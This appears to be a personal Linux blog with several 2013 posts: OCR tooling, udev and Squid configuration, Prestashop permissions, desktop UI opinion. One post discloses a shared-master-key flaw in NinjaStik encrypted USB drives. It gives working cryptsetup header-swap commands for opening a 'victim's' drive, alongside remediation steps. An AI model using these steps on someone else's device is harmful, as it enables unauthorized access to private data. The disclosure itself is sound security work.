Monday, October 14, 2013

Tesseract wrapper

GOCR really doesn't seem to recognize Finnish or different kind of fonts out of the box. Tesseract seems to have no problems in recognizing the content I feed it so I wanted to configure XSANE so that it would use Tesseract instead. Setting up XSANE to use Tesseract is not straightforward though. XSANE expects input and output files to be defined as options when Tesseract accepts the input file as first argument and the basename of the output as second parameter. By default XSANE is configured to use GOCR.

In order to make XSANE work with Tesseract the easy option was just to make a wrapper script that accepts options in the way XSANE can provide them. For this purpose I created a wrapper script for Tesseract.


Comparisons of options:


Tesseract

[sebastian@localhost tesseract-wrapper]$ tesseract --help
Usage:tesseract imagename outputbase [-l lang] [-psm pagesegmode] [configfile...]

pagesegmode values are:
0 = Orientation and script detection (OSD) only.
1 = Automatic page segmentation with OSD.
2 = Automatic page segmentation, but no OSD, or OCR
3 = Fully automatic page segmentation, but no OSD. (Default)
4 = Assume a single column of text of variable sizes.
5 = Assume a single uniform block of vertically aligned text.
6 = Assume a single uniform block of text.
7 = Treat the image as a single text line.
8 = Treat the image as a single word.
9 = Treat the image as a single word in a circle.
10 = Treat the image as a single character.
-l lang and/or -psm pagesegmode must occur before anyconfigfile.

Single options:
  -v --version: version info
  --list-langs: list available languages for tesseract engine

GOCR

[sebastian@localhost tesseract-wrapper]$ gocr --help
 Optical Character Recognition --- gocr 0.49 20100924
 Copyright (C) 2001-2010 Joerg Schulenburg  GPG=1024D/53BDFBE3
 released under the GNU General Public License
 using: gocr [options] pnm_file_name  # use - for stdin
 options (see gocr manual pages for more details):
 -h, --help
 -i name   - input image file (pnm,pgm,pbm,ppm,pcx,...)
 -o name   - output file  (redirection of stdout)
 -e name   - logging file (redirection of stderr)
 -x name   - progress output to fifo (see manual)
 -p name   - database path including final slash (default is ./db/)
 -f fmt    - output format (ISO8859_1 TeX HTML XML UTF8 ASCII)
 -l num    - threshold grey level 0<160<=255 (0 = autodetect)
 -d num    - dust_size (remove small clusters, -1 = autodetect)
 -s num    - spacewidth/dots (0 = autodetect)
 -v num    - verbose (see manual page)
 -c string - list of chars (debugging, see manual)
 -C string - char filter (ex. hexdigits: 0-9A-Fx, only ASCII)
 -m num    - operation modes (bitpattern, see manual)
 -a num    - value of certainty (in percent, 0..100, default=95)
 -u string - output this string for every unrecognized character
 examples:
 gocr -m 4 text1.pbm                   # do layout analyzis
 gocr -m 130 -p ./database/ text1.pbm  # extend database
 djpeg -pnm -gray text.jpg | gocr -    # use jpeg-file via pipe

 webpage: http://jocr.sourceforge.net/

Tesseract wrapper

[sebastian@localhost tesseract-wrapper]$ ./tesseract-wrapper --help
Syntax:
./tesseract-wrapper -i inputfile [-o outputfile] [-l lang]
Clone the repo in Github

Saturday, October 5, 2013

NinjaStik encryption vulnerability

The Discovery

(Photo – Flickr Creative Commons: R’eyes)
We in Bittiraha.fi like gadgets. We also like know what we sell to our customers, so some of the guys started checking out a shipment of NinjaStiks.

I was trying to do some other work while discussing the NinjaStik, anonymity, encryption and other stuff with my co-workers. I had one of those days you just can't get yourself to concentrate..

I'm sceptical of any security tool that doesn't come with the exact instructions on how to reproduce it yourself. There are some instructions on how to get started and technical specifications on the NinjaStik site, but elsewhere on the site they also mention some secret ingredients. People are corruptible and imperfect so anything produced by a human should be considered compromised until proven otherwise. I was arguing my point about trusting a third party when the discussion diverted to the process of changing the default password on the LUKS-partition. There were instructions on how to do so and they came with the NinjaStik.

The Problem

Changing the password for the master key does not change the master key. NinjaStik is a kind of product that you would assume is most conveniently produced by writing an existing disk image to a thumb drive. This was confirmed to be the case with the images extracted from the NinjaStiks we had at hand. We took 2 different NinjaStiks and found they used the same master key. We can assume that the rest of the shipment are clones as well. This means that the claim that your data cannot be accessed without supercomputers and a million years to spend is false. In fact it took 30 minutes including reading man pages, making coffee and browsing Facebook(you can guess which one of these was the most time consuming). It was kind of cool to be able to demonstrate the ability to read the contents of my co-workers drive, which according to the marketing by it's producer was an impossible feat.

The fact how simple it was to defeat the encryption on a NinjaStik raises questions and answers some. How competent are the people behind the development of NinjaStik? Should you take it for granted that someone who produced a security product understands all the caveats or even the basic ones? We're going to re-encrypt the NinjaStiks we sell to our customers as well as include instructions on how to do it themselves.

It would be irresponsible of us to tell our customers to trust that we don't keep copies of the master keys ourselves, so I would rather tell the customer to assume we do and then decide if they want to re-encrypt their device. Who knows, if by accident there is a copy of the master key somewhere in our swap partition and we're forced to hand over that data. Of course whether the customer needs to worry about the encryption depends much on what the customer chooses to do with their NinjaStik or in life generally. For some, who purchase this product, it doesn't really matter if it's encrypted or not.

I didn't explore NinjaStik beyond this vulnerability as I haven't had the time.

The Aftermath

We contacted a NinjaStik representative on the 29th of September and they updated their FAQ pretty soon after we explained the vulnerability to them and provided instructions on how to fix the situation. According to the representative they used to build the NinjaStiks with a room full of PCs, but they recently started cloning. He told us they would contact the customers with affected NinjaStiks and immediately return to building them with the room full of PCs method. He also offered to rebuild the NinjaStiks we had and pay the shipping costs which was nice of him although unnecessary as it's not much of an effort for us to do it ourselves. According the representative there aren't many NinjaStiks out there created with the cloning method. We advised them to build NinjaStiks with another boot option that would boot on the first use and re-encrypt the encrypted partition. We then gave them a week to handle the situation on their end before releasing the details of this vulnerability. Still in their updated FAQ they are downplaying the vulnerability:
"Can I change the encryption passphrase?

Yes you can and it is highly recommended – the NinjaStik ships with a default encryption passphrase and a default login password.  Both of these should be changed the first time you use the NinjaStik.  The NinjaStik also includes instructions to change the volume encryption key to further ensure that even we couldn’t gain access to your NinjaStik."
The wording "to further ensure" sounds to me like something you shouldn't really worry about. In reality the opposite is true. It's not even about just them gaining access to the data on your NinjaStik, everyone can. (The different capacity NinjaStiks might use a different master key, but there are copies of the master keys already out there on already purchased sticks.) Also it's more likely that the one trying to decrypt your device is someone you know or the authorities and thus it's more likely that they have access to the same master key as the one used in your batch.

Then there's the issue of cloning being a recent method for production. I don't see many other plausible reasons for them to use a non-cloning process to manufacture an OS on a thumb drive besides lack of knowledge on how to clone disks or the knowledge that it would make the master key on the NinjaStik known. I'm having difficulties understanding how anyone who put this stick together in the first place would not know how to clone them, so I'm inclined to think they knew that they were compromising the encryption, but maybe didn't realize how serious it was or didn't care. But hey, I'm a paranoid tin foil hat person.

The Method

The same master key is used in all NinjaStiks thus any NinjaStik can be decrypted using the known master key or a backup of the LUKS header(it contains the key). I demonstrate here how to gain access using a copy of a header from a fresh NinjaStik. The way LUKS works is that even if you change the password for the keyslot, the actual key used for encryption stays the same. Therefore it is a trivial task to use a known master key(or vanilla header) to decrypt a LUKS device.

Ingredients: 2 NinjaStiks. The victims NinjaStik, which has an unknown password set and one with a known password.

//Extract the LUKS header from the new NinjaStik. Password is "password"
cryptsetup luksHeaderBackup --header-backup-file=vanilla-header.bak /dev/sda2

//Remove the NinjaStik and plug in the victim's NinjaStik
//Optional step: extract the luks header from the second NinjaStik
cryptsetup luksHeaderBackup --header-backup-file=victim-header.bak /dev/sda2

//Replace the header on the victim's NinjaStik
cryptsetup luksHeaderRestore --header-backup-file=vanilla-header.bak /dev/sdb2

//Open the LUKS partition using the default password "password"
cryptsetup luksOpen /dev/sdb2 stick

//Mount the partition
mkdir /mnt/decrypted
mount /dev/mapper/stick /mnt/decrypted

//Achievement unlocked, you can now read and write on the victims NinjaStik and compromise any security measure on the operating system residing on the stick(install keyloggers or whatever)

//Unmount the stick and close the LUKS partition
umount /mnt/decrypted
cryptsetup luksClose stick

//Restore the original header to the stick
cryptsetup luksHeaderRestore --header-backup-file=victim-header.bak /dev/sdb2

//The victims NinjaStik can now again be opened with the password set by the victim.

One alternative approach is to just clone the victims NinjaStik without making any changes to the stick at all. The contents of the victims NinjaStik can be decrypted using an image of the victims NinjaStik and a header with the known password.

The Quick Fix

In order to prevent unauthorized access to a NinjaStik the very first thing a user should do is re-encrypt the luks partition. This can be done after booting the computer with a linux LiveCD. I recommend Fedora Live Desktop. The cryptsetup-reencrypt tool is not preinstalled on the LiveCD, but you can install it from the command line by issuing the command
sudo yum -y install cryptsetup-reencrypt
A quick look led me to the conclusion that cryptsetup-reencrypt tool is not available on Ubuntu 12.04.3 at the moment. After you have booted up the LiveCD open up a terminal, gain root privileges, plug in the NinjaStik and follow these instructions


//identify the last plugged in device

dmesg|tail
[ 1494.609774] sd 6:0:0:0: [sdf] Write Protect is off
[ 1494.609781] sd 6:0:0:0: [sdf] Mode Sense: 23 00 00 00
[ 1494.610406] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.610409] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.613495] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.613500] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.614011]  sdf: sdf1
[ 1494.616820] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.616824] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.616827] sd 6:0:0:0: [sdf] Attached SCSI removable disk

//you see here we plugged in the device /dev/sdf
//on the NinjaStik the second partition is the encrypted one 
//thus the partition we want to re-encrypt would be /dev/sdf2

//re-encrypt the partition, it will take some time
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 /dev/yourdevice

Alternatively you can and probably should do these operations on a copy of your NinjaStik image instead and after you have confirmed it works write the resulting image on your NinjaStik.

See more info on re-encryption here: http://asalor.blogspot.fi/2012/08/re-encryption-of-luks-device-cryptsetup.html

You should check your master key details with cryptsetup luksDump. The default header we had in our stiks looked like this:

Version:        1
Cipher name:    aes
Cipher mode:    cbc-essiv:sha256
Hash spec:      sha1
Payload offset: 4096
MK bits:        256
MK digest:      bb 49 14 91 26 e1 be 4e 45 2c 9e 81 15 95 45 43 14 1d 9c eb 
MK salt:        09 b3 d0 c4 15 8e cb 0b 4c 20 02 39 a3 71 7c 67 
                61 5c 3a ef 8b 3f f9 87 fb d5 bc 03 b9 eb ca 21 
MK iterations:  18750
UUID:           4f85fbe5-2d73-47e4-a59f-3ae3b080d913

In all cases you should re-encrypt. Even if the master key differs from this one. If you find that your master key matches, leave a comment.

The Solution

NinjaStiks should contain a second boot option to boot the stick into a mode where the encrypted partition is not mounted. After booting is complete the stick should run a script that asks the user for a current password and a new password twice. The script should then re-encrypt the encrypted partition and reboot. At the moment this also requires updating the cryptsetup version to 1.5 as the current available version(1.4.1) on Ubuntu 12.04.3 does not contain the re-encryption tool.

A Conclusion

The worst threat to security is false security.

Originally posted in my blog Semantics

UPDATE:
If you want to check whether you have a NinjaStik that was manufactured with a cloning process, paste the sha256 digest of your master key digest in the comments below.

IMPORTANT:
The only thing that can be proven is that if you find two drives with the same master key digest, the corresponding master key is very compromised. If the digests are different, it does not prove anything. There is no guarantee that someone does not know the master key of your NinjaStik the moment you receive it, therefore if you have to be absolutely sure nobody else can open your NinjaStik you have to re-encrypt if yourself. You should also request that the NinjaStik manufacturer provides a first start feature, where the stick is re-encrypted with a random master key before use.

 If you don't understand what this command does, you probably shouldn't be pasting it into your console.(that goes for every tutorial on the interwebs) You should actually never paste stuff directly to your terminal.

//print out the sha256 digest of your master key digest like this
cryptsetup luksDump /dev/yourdevice|grep 'MK digest'|sed -e 's/^MK digest:[[:space:]]*//'|sha256sum
//you should have a hash that is reasonably well anonymized. Paste it in the comments for others to see and compare.

Saturday, June 1, 2013

Why Gnome 3 sucks for a desktop power user

When Gnome 3 replaced my familiar Gnome 2 user experience I was not very pleased. The point of this post is that instead of just complaining about Gnome 3 I would like to help make it better.

What I noticed first

My productivity suffered. I was spending more time waiting and searching for apps, information and action buttons. I'm used to be able to glance my screen and absorb a lot of information about the state of my files, apps and whatever. Trying to do this on Gnome 3 I would just waste time and get easily distracted. Why can't I even see modification times for files modified on any other day than today? Why isn't there even an option in settings for this? Why can't I change the SElinux security context of my files? I wanted to really know why the user experience sucked for me so I tried to figure out what is the difference between Gnome 2 and 3. My conclusion was that Gnome 3 is a window manager for touch based devices, but tries and fails to be a window manager for desktop as well.

Desktop UI

  • Viewing distance: short
  • Pointing device: mouse
  • Text input: physical keyboard
  • Usage: a wide selection of applications that are used with both keyboard and mouse at the same time. Ratio of interactions/time is high.
  • Hardware: Fast processor and lots of memory, high resolution
Because the amount of interactions is high even the slightest delays will add up to much time spent waiting.
A desktop UI has evolved to perform most actions with minimal effort.(Minimize mouse travel, use keyboard shortcuts in order to avoid menus)

On a traditional application menu you can pretty much find all the desktop applications available for you and you can very quickly get a picture what's available in each category of applications. It is very suitable for a desktop operating system with lots of applications. On a touch based device this kind of a menu would be difficult to use as the size of items is too small to use with an inaccurate pointing device. A traditional application menu is designed to be used with a mouse.

Touch or gesture based UI

  • Viewing distance: short or long
  • Pointing device: touch or gesture based
  • Text input: mostly on screen keyboard controlled by pointing device but also speech recognition
  • Types of devices: Smartphone, tablet and television/multimedia center
  • Usage: mostly limited to few applications and does not require custom commands in order to serve its purpose. Ratio of interactions/time is low.
  • Hardware: Cheaper processors and less memory, resolution varies
Amount of interactions is relatively low. Delays in areas you don't frequently use(settings, tuning etc.) not that important as long as basic usage is fast.(Answering, changing channels etc.)
Basic usage is with an inaccurate pointing device and limited screen size.(Spreads content into multiple screens and displays on screen navigational cues.)

You can clearly see that Gnome 3 is designed in a way that it would be easy to use by touch. Any touch device must deal with the inaccuracy of fingers as pointing device, this reduces the maximum amount of items you can interact with at any time. Although you can use a mouse to do gestures similar to those done by fingers, it requires moving the mouse more than in a desktop user interface. Using the application menu to find an application becomes time consuming when using a mouse, especially when you have a lot of applications installed. You can expect a touch based device to contain less applications to look for. Thus the amount of applications should not be a problem on a touch device.

When gnome 3 is used on a desktop you naturally have a keyboard available as well. You can quite quickly press the super-key and type the first letters of the application name you wish to launch, provided that you don't blank out on the name of the app. For me it happens quite often. On the plus side, plugins look pretty and are quite easy to install. You can get a traditional application menu with a plugin.

A desktop window manager is fundamentally different from a touch based window manager. A desktop user interface specializes in how to best manage applications with a high on screen item density and a high resolution pointing device. Using a desktop oriented UI is difficult with an inaccurate pointing device such as the finger. Even if you had very accurate fingers it is impossible to see through your finger and thus you can only estimate within some margin of error what are the exact coordinates of the pointer. A finger also produces more random movement even when you try to keep it perfectly still and even more so when you are beginning to touch and releasing your finger from the surface of the screen. In addition to touch devices low on screen item density is suitable for a computer in the living room. It would make sense to control such a device with hand gestures or a motion tracked remote(Kinect or webcam + some OpenCV magic).

It is my belief that by currently trying to satisfy both desktop and touch device users with the same UI, you are not doing a good UI for either one. You should accept that there are fundamental differences and that the user interface should be different. Maybe the window manager should adapt the UI better depending on the input devices available? Touch based user interfaces are still relatively new and there might be some new innovations in that field. I hope that someone comes up with ways to make such interfaces easier and faster to use on a desktop computer as well.

Thursday, April 11, 2013

Configuring a 4-port Sun Happy Meal card

Some time ago I rescued a pair of 4 port Oracle/SUN Happy Meal 10/100 Ethernet cards and I decided it was time to play with them. There was an issue with the sunhme driver, so I created an akmod package for Fedora 18 to patch the bug on my system so that the patch would be picked up automatically on every kernel update as well. The akmod package is available on github.

There's another quirk to these cards as well. At least on my system there is an issue with renaming the interface names that leads to one of the interfaces being renamed inconsistently(interface name ends up being something like "rename6"). I wanted to rename the interfaces nicely so that I could tell the sunhme interfaces from other interfaces in my system.

In addition to weird renames these cards have only one shared mac-address assigned to each interface, so you can't just match the interfaces by their mac-address, since they're the same.

These quirks made getting the udev rules to match rather challenging. Eventually I found a nice script that scans for the interfaces and creates a template for a proper matching udev rule.

In order to be able to use just on interface without having packets disappearing on the other interfaces, which might not be physically connected I also set unique mac-addresses for all the interfaces.

/etc/udev/rules.d/30-sun-hme.rules

SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:00.1", \
    KERNEL=="eth*", NAME="hme0", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e5"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:01.1", \
    KERNEL=="eth*", NAME="hme1", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e6"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:02.1", \
    KERNEL=="eth*", NAME="hme2", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e7"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:03.1", \
    KERNEL=="eth*", NAME="hme3", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a6:58:e8"

/usr/local/bin/sunmacchanger

#!/bin/bash

#make sure the interface is down, otherwise setting the mac will fail
/sbin/ifconfig $1 down
/usr/bin/macchanger --mac=$2 $1

After the changes I just needed to unload the driver, reload the rules and load the driver again and udev magic would happen
chmod +x /usr/local/bin/sunmacchanger
rmmod sunhme
udevadm control --reload-rules
#loading my patched version of sunhme driver
modprobe sunhme2g

Now I have 4 100M interfaces on one card. It'll come handy when routing traffic outside my LAN and I could have redundancy in case one WAN connection goes down.

Unless I spesifically tell NetworkManager not to bring up interfaces hme1-hme3, NetworkManager will bring those interfaces up. This causes some log spam:

output of dmesg

[ 6438.361078] hme1: Auto-Negotiation unsuccessful, trying force link mode
[ 6438.369059] hme2: Auto-Negotiation unsuccessful, trying force link mode
[ 6438.373052] hme3: Auto-Negotiation unsuccessful, trying force link mode
[ 6447.974274] hme1: Link down, cable problem?
[ 6447.982269] hme2: Link down, cable problem?
[ 6447.986242] hme3: Link down, cable problem?
[ 6459.990561] hme1: Auto-Negotiation unsuccessful, trying force link mode
[ 6459.998551] hme2: Auto-Negotiation unsuccessful, trying force link mode
[ 6460.002549] hme3: Auto-Negotiation unsuccessful, trying force link mode
[ 6469.603795] hme1: Link down, cable problem?
[ 6469.611764] hme2: Link down, cable problem?
[ 6469.615756] hme3: Link down, cable problem?

You can prevent NetworkManager from needlessly bringing up these interfaces by adding the macs to the unmanaged-devices parameter in [keyfile] section and checking that keyfile plugin is loaded in [main] section's plugins parameter.

/etc/NetworkManager/NetworkManager.conf

[main]
plugins=ifcfg-rh,keyfile

[keyfile]
unmanaged-devices=mac:00:03:ba:a8:58:e6;mac:00:03:ba:a8:58:e7;mac:00:03:ba:a8:58:e8

It's not exactly plug and play, but playing with these cards is a good learning opportunity. It wouldn't hurt to have some kind of graphical configuration tools for doing some of this stuff. It requires some knowledge about udev and NetworkManager + a search engine to do this "manually".

Sunday, April 7, 2013

Google Redirect Rewrite memory usage

Image courtesy of Open Clip Art Library
I previously found out that you can pretty easily rewrite url's for Squid. Today I noticed Squid launches a bunch of child processes to do the url rewriting. I got curious about the memory usage. I had a feeling that the Perl version would not consume as much memory as PHP and it appears it is indeed so.

I tested both PHP and Perl versions to see how much memory they would consume. First I checked the memory usage of the PHP version after browsing a bit. Then I changed squid.conf to use the Perl version and again checked the memory usage. Squid had just launched one googlerewriter child process, so I browsed some more and then checked again. I'm guessing Squid starts the processes when it actually needs them.(ps. Documentation confirmes this) Anyway some processes then appeared to have been launched.

Fields

MAJFL
Major page fault: The number of major page faults that have occurred with this process
TRS (kB)
Text resident set: The amount of physical memory devoted to executable code
DRS (kB)
Data resident set: The amount of physical memory devoted to other than executable code
RSS (kB)
Resident set size: The portion of a process's memory that is held in RAM. The rest of the memory exists in swap or the filesystem (never loaded or previously unloaded parts of the executable).

Even for a tiny script php version caused some page faults and it's using way too much memory for the task it's doing.

PHP

$ ps faxv
  PID TTY      STAT   TIME  MAJFL   TRS   DRS   RSS %MEM COMMAND
13098 ?        Ss     0:00      0  5047 12668  2608  0.0 /usr/sbin/squid -a 3128 -f /etc/squid/squid.conf
13100 ?        S      0:01      5  5047 35240 25052  0.4  \_ (squid-1) -a 3128 -f /etc/squid/squid.conf
13101 ?        S      0:00      0     5  3942   992  0.0      \_ (logfile-daemon) /var/log/squid/access.log
13102 ?        S      0:00      1     2  3793   740  0.0      \_ (unlinkd)
13109 ?        S      0:00     50  3385 43962  7812  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13111 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13115 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13116 ?        S      0:00      0  3385 43962  7812  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13117 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php

$ top
  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
15552 squid     20   0 47348 7812 5428 S   0.0  0.1   0:00.05 googlerewriter.
15735 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
15736 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
15741 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
The resident set size of the Perl version is 31% that of the PHP version, or in other words the PHP version is using 3 times as much memory per process. By using the Perl version you'd save at least 5.2MiB. Not that this matters much on my current proxy server, but for an embedded server it would matter.

Perl

$ ps faxv
  PID TTY      STAT   TIME  MAJFL   TRS   DRS   RSS %MEM COMMAND
13382 ?        Ss     0:00      0  5047 12668  2608  0.0 /usr/sbin/squid -a 3128 -f /etc/squid/squid.conf
13384 ?        S      0:01      0  5047 37988 25308  0.4  \_ (squid-1) -a 3128 -f /etc/squid/squid.conf
13387 ?        S      0:00      0     5  3942   992  0.0      \_ (logfile-daemon) /var/log/squid/access.log
13388 ?        S      0:00      0     2  3793   740  0.0      \_ (unlinkd)
13396 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13426 ?        S      0:00      0     3  8700  2376  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13427 ?        S      0:00      0     3  8700  2372  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13429 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13430 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13431 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl

$ top
  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
13396 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.19 googlerewriter.
13429 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.03 googlerewriter.
13430 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.02 googlerewriter.
13431 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.02 googlerewriter.
13426 squid     20   0  8704 2376 1716 S   0.0  0.0   0:00.04 googlerewriter.
13427 squid     20   0  8704 2372 1716 S   0.0  0.0   0:00.03 googlerewriter.

Saturday, April 6, 2013

Faster browsing aka Google Redirect Rewrite

Image courtesy of Open Clip Art Library
Once again I got annoyed by having to wait for Google to redirect me. I also think it's none of Google's business to know which sites I do visit especially if they can't be quick about it. So I decided to get rid of the delay.
I checked if there's a plugin for that and it seems there is. You can install Remove Google Redirects from Chrome Web Store. Being a paranoid weirdo like I am that still wasn't enough. I already had a Squid proxy that I had configured to make it so that you couldn't even know that some websites were blocked by my ISP(Sonera). It made sense to try and figure out if there was a trick that I could do with squid that allows me to get rid of the middle man(Google) in the redirect process.

And behold for the creators of Squid have indeed been so wise as to add a way to mangle the urls. All I had to do was to write a script that takes the url, checks if it's a google redirect url and if so, parses the url to get the actual url where we want to go and return that. The example on Squid feature page was a good place to start and this is what I came up with:

Perl Version


#!/usr/bin/perl

use URI;
use URI::QueryParam;

$|=1;
while (<>) {
    chomp;
    @X = split;
    $url = $X[1];
    #check if this is a google redirect url
    if ($url =~ /\/\/.*\.google\.[^\/]+\/url/) {
        my $uri = URI->new($url);
        $url = $uri->query_param("url");
        print $X[0]." 302:$url\n";
    } else {
        print $X[0]." \n";
    }
}
I had to install a couple of Perl modules while I was trying to refamiliarize myself with Perl so I wanted make a PHP version of the same helper. With PHP I wouldn't have to install any extra modules when some day I decide to use this on some other machine. I usually have PHP installed everywhere.

PHP Version


#!/usr/bin/php
<?php

function convertUrlQuery($query) {
    $queryParts = explode('&', $query);

    $params = array();
    foreach ($queryParts as $param) {
        $item = explode('=', $param);
        $params[$item[0]] = $item[1];
    }

    return $params;
}
while(1){
    $line = trim(fgets(STDIN)); // reads one line from STDIN
    $params = explode(" ", $line);
    $pattern = '/\/\/.*\.google\.[^\/]+\/url/';

    if (preg_match($pattern, $params[1], $matches, PREG_OFFSET_CAPTURE, 3)) {
        $parts = parse_url($params[1]);
        $query = convertUrlQuery($parts['query']);
        $url = urldecode($query['url']);
        echo $params[0]." 302:$url\n";
    } else {
        echo $params[0]." \n";
    }
}


In the end I like that with Perl I didn't have to write any functions for simple things like url parsing, but unless I package this as an installable package I could not just drop it in and expect it to work since I had to install the extra stuff as modules.(Yes I could have written my own implementation, but I'm not that much into reinventing the wheel. Also I was a bit impatient to get the script ready so I could see the results) With the PHP version I could just drop it in and as long as I had PHP installed it would work.

I strongly recommend adding a line in squid.conf It really makes a difference.

url_rewrite_program /path/to/googleredirectrewriter

Tuesday, April 2, 2013

Setting up Prestashop file permissions on Fedora

Sometimes I need to write important things somewhere I can find them. That's the case again with setting up Prestashop file permissions on a SElinux enabled system such as Fedora.


cd prestashop
chown -R apache:sebastian
# allow user and group search directories and set the new files inherit the group of parent folder 
find . -type d -exec chmod ug+xs {} \;
# don't allow others to do anything and allow my group to read and write all, don't allow apache to write anything
chmod -R u-w,o-rwxs,g+rw .
# set permissions of newly created files so that others cannot do anything them
umask o-rwx
# set selinux context so that apache can access everything
chcon -t httpd_sys_content_t -R .
# set selinux context and permissions so that apache can write into places it needs to be able to write
chcon -t httpd_sys_rw_content_t -R config cache log img mails modules translations upload download sitemap.xml
chmod -R u+rw config cache log img mails modules translations upload download sitemap.xml

Wednesday, March 27, 2013

This page was not left blank after all

Like a break after a paragraph, a blank page is something you would expect after a chapter, after the table of contents and before appendices. Blank pages make it easier to read the content for which it acts as a separator.

For some reason a practice of adding disclaimers to the blank pages has been gaining popularity. Some are even promoting it. What is the reason for this? Are people getting too stupid to figure out on their own that a blank page is there just to separate content? It is possible that I'm just suffering from Baader-Meinhof Phenomenon again, but I'm sure that books used to contain a lot of blank pages without needing disclaimers on them.

I like to immerse myself when I'm reading and just consume the words as quickly as I am able to. Sometimes I find myself reading a line that has no relevance to the work I'm reading. There are a few variations, but it usually reads something like:


This page intentionally left blank


It's a lie. Actually it's not even a sentence(lack of a verb). The page ceases to be blank after it is written on. I'ts distracting. I's like a speaker keeping on talking without interruption instead of taking a pause to emphasize some point or to give some time for thinking. It's kind of like replacing every possible pause with verbal fillers. It's unnecessary and confusing. 

Okay, there might be situations where the author has not made it clear that the previous segment has ended, but then it's the matter of the author not doing a good enough job or you're reading something like poetry. A disclaimer at this point won't help you very much in any case. Sometimes it's distracting enough for someone to stop reading and instead write a blog article about it. So do everyone a favor and don't put empty page disclaimers, maybe then someone else is spared from an article like this.

What's wrong with a simple page number?

Tip me if you like what you're reading